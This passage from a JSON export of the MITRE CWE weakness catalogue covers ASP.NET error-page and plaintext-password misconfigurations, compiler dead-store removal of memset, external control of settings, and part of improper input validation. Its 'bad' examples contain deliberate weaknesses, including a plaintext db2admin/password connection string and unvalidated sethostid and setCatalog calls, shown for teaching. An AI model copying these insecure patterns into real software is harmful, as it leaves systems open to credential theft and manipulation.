default error page to mount attacks targeted on the framework, database, or other resources used by the application."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"System Configuration","Description":"Handle exceptions appropriately in source code. ASP .NET applications should be configured to use custom error pages instead of the framework default page."},{"Phase":"Architecture and Design","Description":"Do not attempt to process an error or attempt to mask it."},{"Phase":"Implementation","Description":"Verify return values are correct and do not supply sensitive information about the system."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-75"},"Intro_Text":"The mode attribute of the &lt;customErrors&gt; tag in the Web.config file defines whether custom or default error pages are used.","Body_Text":["In the following insecure ASP.NET application setting, custom error message mode is turned off. An ASP.NET error message with detailed stack trace and platform versions will be returned.","A more secure setting is to set the custom error message mode for remote users only. No defaultRedirect error page is specified. The local user on the web server will see a detailed stack trace. For remote users, an ASP.NET error message with the server customError configuration setting and the platform version will be returned.","Another secure option is to set the mode attribute of the &lt;customErrors&gt; tag to use a custom page as follows:"],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":"&lt;customErrors mode=\\"Off\\" /&gt;"},{"attr":{"@_Nature":"good","@_Language":"ASP.NET"},"xhtml:div":"&lt;customErrors mode=\\"RemoteOnly\\" /&gt;"},{"attr":{"@_Nature":"good","@_Language":"ASP.NET"},"xhtml:div":"&lt;customErrors mode=\\"On\\" defaultRedirect=\\"YourErrorPage.htm\\" /&gt;"}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"ASP.NET Misconfiguration: Missing Custom Error Handling"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-65"}},{"attr":{"@_External_Reference_ID":"REF-66"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Background_Details, Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"ASP.NET Misconfiguration: Missing Custom Error Handling","attr":{"@_Date":"2009-03-10"}}}},"13":{"attr":{"@_ID":"13","@_Name":"ASP.NET Misconfiguration: Password in Configuration File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource making them an easy target for attackers.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"260","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Credentials stored in configuration files should be encrypted, Use standard APIs and industry accepted algorithms to encrypt the credentials stored in configuration files."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database, but the pair is stored in plaintext.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"Username and password information should not be included in a configuration file or a properties file in plaintext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"ASP.NET Misconfiguration: Password in Configuration File"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-103"}},{"attr":{"@_External_Reference_ID":"REF-104"}},{"attr":{"@_External_Reference_ID":"REF-105"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"14":{"attr":{"@_ID":"14","@_Name":"Compiler Removal of Code to Clear Buffers","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Sensitive memory is cleared according to the source code, but compiler optimizations leave the memory untouched when it is not read from again, aka \\"dead store removal.\\"","Extended_Description":{"xhtml:p":"This compiler optimization error occurs when:","xhtml:ul":{"xhtml:li":["1. Secret data are stored in memory.","2. The secret data are scrubbed from memory by overwriting its contents.","3. The source code is compiled using an optimizing compiler, which identifies and removes the function that overwrites the contents as a dead store because the memory is not used subsequently."]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"733","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Build and Compilation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Memory","Bypass Protection Mechanism"],"Note":"This weakness will allow data that has not been cleared from memory to be read. If this data contains sensitive password information, then an attacker can read the password and use the information to bypass protection mechanisms."}},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"This specific weakness is impossible to detect using black box methods. While an analyst could examine memory to see that it has not been scrubbed, an analysis of the executable would not be successful. This is because the compiler has already removed the relevant code. Only the source code shows whether the programmer intended to clear the memory or not, so this weakness is indistinguishable from others."},{"Method":"White Box","Description":"This weakness is only detectable using white box methods (see black box detection factor). Careful analysis is required to determine if the code is likely to be removed by the compiler."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Store the sensitive data in a \\"volatile\\" memory location if available."},{"Phase":"Build and Compilation","Description":"If possible, configure your compiler so that it does not remove dead stores."},{"Phase":"Architecture and Design","Description":"Where possible, encrypt sensitive data that are used by a software system."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code reads a password from the user, uses the password to connect to a back-end mainframe and then attempts to scrub the password from memory using memset().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void GetData(char *MFAddr) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char pwd[64];if (GetPasswordFromUser(pwd, sizeof(pwd))) {}memset(pwd, 0, sizeof(pwd));","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (ConnectToMainframe(MFAddr, pwd)) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Interaction with mainframe"}}}}}}}},"Body_Text":["The code in the example will behave correctly if it is executed verbatim, but if the code is compiled using an optimizing compiler, such as Microsoft Visual C++ .NET or GCC 3.x, then the call to memset() will be removed as a dead store because the buffer pwd is not used after its value is overwritten [18]. Because the buffer pwd contains a sensitive value, the application may be vulnerable to attack if the data are left memory resident. If attackers are able to access the correct region of memory, they may use the recovered password to gain control of the system.","It is common practice to overwrite sensitive data manipulated in memory, such as passwords or cryptographic keys, in order to prevent attackers from learning system secrets. However, with the advent of optimizing compilers, programs do not always behave as their source code alone would suggest. In the example, the compiler interprets the call to memset() as dead code because the memory being written to is not subsequently used, despite the fact that there is clearly a security motivation for the operation to occur. The problem here is that many compilers, and in fact many programming languages, do not take this and other security concerns into consideration in their efforts to improve efficiency.","Attackers typically exploit this type of vulnerability by using a core dump or runtime mechanism to access the memory used by a particular application and recover the secret information. Once an attacker has access to the secret information, it is relatively straightforward to further exploit the system and possibly compromise other resources with which the application interacts."]}},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Insecure Compiler Optimization"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Sensitive memory uncleared by compiler optimization"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC06-C","Entry_Name":"Be aware of compiler optimization when dealing with sensitive data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, &#34;A Compiler Optimization Caveat&#34; Page 322"}},{"attr":{"@_External_Reference_ID":"REF-124"}},{"attr":{"@_External_Reference_ID":"REF-125"}},{"attr":{"@_External_Reference_ID":"REF-126"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Insecure Compiler Optimization","attr":{"@_Date":"2008-04-11"}}}},"15":{"attr":{"@_ID":"15","@_Name":"External Control of System or Configuration Setting","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"One or more system settings or configuration elements can be externally controlled by a user.","Extended_Description":"Allowing external control of system settings can disrupt service or cause an application to behave in unexpected, and potentially malicious ways.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"Setting manipulation vulnerabilities occur when an attacker can control values that govern the behavior of the system, manage specific resources, or in some way affect the functionality of the application."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"Phase":["Implementation","Architecture and Design"],"Description":"Because setting manipulation covers a diverse set of functions, any attempt at illustrating it will inevitably be incomplete. Rather than searching for a tight-knit relationship between the functions addressed in the setting manipulation category, take a step back and consider the sorts of system values that an attacker should not be allowed to control."},{"Phase":["Implementation","Architecture and Design"],"Description":"In general, do not allow user-provided or otherwise untrusted data to control sensitive values. The leverage that an attacker gains by controlling these values is not always immediately obvious, but do not underestimate the creativity of the attacker."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following C code accepts a number as one of its command line parameters and sets it as the host ID of the current machine.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...sethostid(argv[1]);...","xhtml:br":["",""]}},"Body_Text":"Although a process must be privileged to successfully invoke sethostid(), unprivileged users may be able to invoke the program. The code in this example allows user input to directly control the value of a system setting. If an attacker provides a malicious value for host ID, the attacker can misidentify the affected machine on the network or cause other unintended behavior."},{"Intro_Text":"The following Java code snippet reads a string from an HttpServletRequest and sets it as the active catalog for a database Connection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...conn.setCatalog(request.getParameter(\\"catalog\\"));...","xhtml:br":["",""]}},"Body_Text":"In this example, an attacker could cause an error by providing a nonexistent catalog name or connect to an unauthorized portion of the database."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Setting Manipulation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"146"}},{"attr":{"@_CAPEC_ID":"176"}},{"attr":{"@_CAPEC_ID":"203"}},{"attr":{"@_CAPEC_ID":"270"}},{"attr":{"@_CAPEC_ID":"271"}},{"attr":{"@_CAPEC_ID":"69"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"77"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Setting Manipulation","attr":{"@_Date":"2008-04-11"}}}},"20":{"attr":{"@_ID":"20","@_Name":"Improper Input Validation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product receives input or data, but it does\\n        not validate or incorrectly validates that the input has the\\n        properties that are required to process the data safely and\\n        correctly.","Extended_Description":{"xhtml:p":["Input validation is a frequently-used technique\\n\\t   for checking potentially dangerous inputs in order to\\n\\t   ensure that the inputs are safe for processing within the\\n\\t   code, or when communicating with other components.  When\\n\\t   software does not validate input properly, an attacker is\\n\\t   able to craft the input in a form that is not expected by\\n\\t   the rest of the application. This will lead to parts of the\\n\\t   system receiving unintended input, which may result in\\n\\t   altered control flow, arbitrary control of a resource, or\\n\\t   arbitrary code execution.","Input validation is not the only technique for\\n\\t   processing input, however.  Other techniques attempt to\\n\\t   transform potentially-dangerous input into something safe, such\\n\\t   as filtering (CWE-790) - which attempts to remove dangerous\\n\\t   inputs - or encoding/escaping (CWE-116), which attempts to\\n\\t   ensure that the input is not misinterpreted when it is included\\n\\t   in output to another component. Other techniques exist as well\\n\\t   (see CWE-138 for more examples.)","Input validation can be applied to:","Data can be simple or structured.  Structured data\\n\\t   can be composed of many nested layers, composed of\\n\\t   combinations of metadata and raw data, with other simple or\\n\\t   structured data.","Many properties of raw data or metadata may need\\n\\t   to be validated upon entry into the code, such\\n\\t   as:","Implied or derived properties of data must often\\n\\t   be calculated or inferred by the code itself.  Errors in\\n\\t   deriving properties may be considered a contributing factor\\n\\t   to improper input validation.","Note that \\"input validation\\" has very different\\n\\t   meanings to different people, or within different\\n\\t   classification schemes.  Caution must be used when\\n\\t   referencing this CWE entry or mapping to it.  For example,\\n\\t   some weaknesses might involve inadvertently giving control\\n\\t   to an attacker over an input when they should not be able\\n\\t   to provide an input at all, but sometimes this is referred\\n\\t   to as input validation.","Finally, it is important to emphasize that the\\n\\t   distinctions between input validation and output escaping\\n\\t   are often blurred, and developers must be careful to\\n\\t   understand the difference, including how input validation\\n\\t   is not always sufficient to prevent vulnerabilities,\\n\\t   especially when less stringent data types must be\\n\\t   supported, such as free-form text. Consider a SQL injection\\n\\t   scenario in which a person\'s last name is inserted into a\\n\\t   query. The name \\"O\'Reilly\\" would likely pass the validation\\n\\t   step since it is a common last name in the English\\n\\t   language. However, this valid name cannot be directly\\n\\t   inserted into the database because it contains the \\"\'\\"\\n\\t   apostrophe character, which would need to be escaped or\\n\\t   otherwise transformed. In this case, removing the\\n\\t   apostrophe might reduce the risk of SQL injection, but it\\n\\t   would produce incorrect behavior because the wrong name\\n\\t   would be recorded."],"xhtml:ul":[{"xhtml:li":["raw data - strings, numbers, parameters, file contents, etc.","metadata - information about the raw data, such as headers or size"]},{"xhtml:li":["specified quantities such as size, length, frequency, price, rate, number of operations, time, etc.","implied or derived quantities, such as the actual size of a file instead of a specified size","indexes, offsets, or positions into more complex data structures","symbolic keys or other elements into hash tables, associative arrays, etc.","well-formedness, i.e. syntactic correctness - compliance with expected syntax","lexical token correctness - compliance with rules for what is treated as a token","specified or derived type - the actual type of the input (or what the input appears to be)","consistency - between individual data elements, between raw data and metadata, between references, etc.","conformance to domain-specific rules, e.g. business logic","equivalence - ensuring that equivalent inputs are treated the same","authenticity, ownership, or other attestations about the input, e.g. a cryptographic signature to prove the source of the data"]}]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"22","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"41","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"74","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"770","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","If a programmer believes that an attacker cannot modify certain inputs, then the programmer might not perform any input validation at all. For example, in web applications, many programmers believe that cookies and hidden form fields can not be modified from a web browser (CWE-472), although they can be altered using a proxy or a custom program. In a client-server architecture, the programmer might assume that client-side security checks cannot be bypassed, even when a custom client could be written that skips those checks (CWE-602)."]}}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"An attacker could provide unexpected values and cause a program crash or excessive consumption of resources, such as memory and CPU."},{"Scope":"Confidentiality","Impact":["Read Memory","Read Files or Directories"],"Note":"An attacker could read confidential data if they are able to control resource references."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"An attacker could use malicious input to modify data or possibly alter control flow in unexpected ways, including arbitrary command execution."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-3"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Some instances of improper input validation can be detected using automated static analysis.","A static analysis tool might allow the user to specify which application-specific methods or functions perform input validation; the tool might also have built-in knowledge of validation frameworks such as Struts. The tool may then suppress or de-prioritize any associated warnings. This allows the analyst to focus on areas of the software in which input validation does not appear to be present.","Except in the cases described in the previous paragraph, automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes."]}},{"attr":{"@_Detection_Method_ID":"DM-4"},"Method":"Manual Static Analysis","Description":"When custom input validation is required, such as when enforcing business rules, manual analysis is necessary to ensure that the validation is properly implemented."},{"attr":{"@_Detection_Method_ID":"DM-5"},"Method":"Fuzzing","Description":"Fuzzing techniques can be useful for detecting input validation errors. When unexpected inputs are provided to the software, the software should not crash or otherwise become unstable, and it should generate application-controlled error messages. If exceptions or interpreter-generated error messages occur, this indicates that the input was not detected and handled within the application logic itself."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything 